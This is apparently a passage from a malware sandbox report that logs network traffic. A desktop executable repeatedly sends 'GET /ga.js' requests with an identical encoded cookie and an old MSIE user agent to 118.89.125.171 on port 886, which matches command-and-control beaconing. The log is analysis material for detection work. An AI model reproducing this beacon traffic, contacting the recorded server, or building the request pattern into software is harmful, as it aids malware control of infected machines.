Apr 20, 2024 15:22:46.711668968 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:47.033631086 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:46 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49772	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:47.459705114 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:47.776561022 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:47 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49773	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:48.213964939 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:48.539407015 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:48 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49774	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:48.984580994 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:49.331017017 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	49775	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:49.770262957 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:50.097642899 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	49777	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:50.528553963 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:50.844485998 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:50 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	49778	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:51.271276951 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:51.585975885 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:51 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	49779	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:52.056080103 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:52.398250103 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	49780	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:52.835102081 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:53.151935101 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:52 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	49781	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:53.605076075 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:53.928647995 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:53 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	49782	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:54.368356943 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:54.685033083 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:54 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49783	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:55.114778996 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:55.432183981 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:55 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	49784	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:55.868470907 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:56.183566093 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	49785	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:56.614278078 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:56.932862997 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:56 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	49786	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:57.370126963 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:57.684832096 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	49787	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:58.122930050 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:58.442425966 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	49788	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:59.069041967 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:22:59.386859894 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	49789	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:22:59.824006081 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:00.140428066 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:22:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	49790	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:00.570365906 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:00.886619091 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	49791	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:01.325170040 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:01.640191078 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	49792	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:02.082525015 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:02.411448002 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	49793	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:02.853945971 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:03.176908016 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	49794	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:03.599214077 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:03.915080070 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	49795	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:04.349442005 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:04.664644003 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	49796	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:05.101224899 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:05.419447899 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	49797	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:05.847280025 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:06.160495043 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	49798	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:06.584547997 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:06.899323940 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	49799	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 15:23:07.362641096 CEST	400	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space) Host: 118.89.125.171:886 Connection: Keep-Alive Cache-Control: no-cache
Apr 20, 2024 15:23:07.709867001 CEST	115	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 13:23:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	49800	118.89.125.171	886	4304	C:\Users\user\Desktop\cH0s914NeF.exe

Timestamp	Bytes transferred	Direction	Data
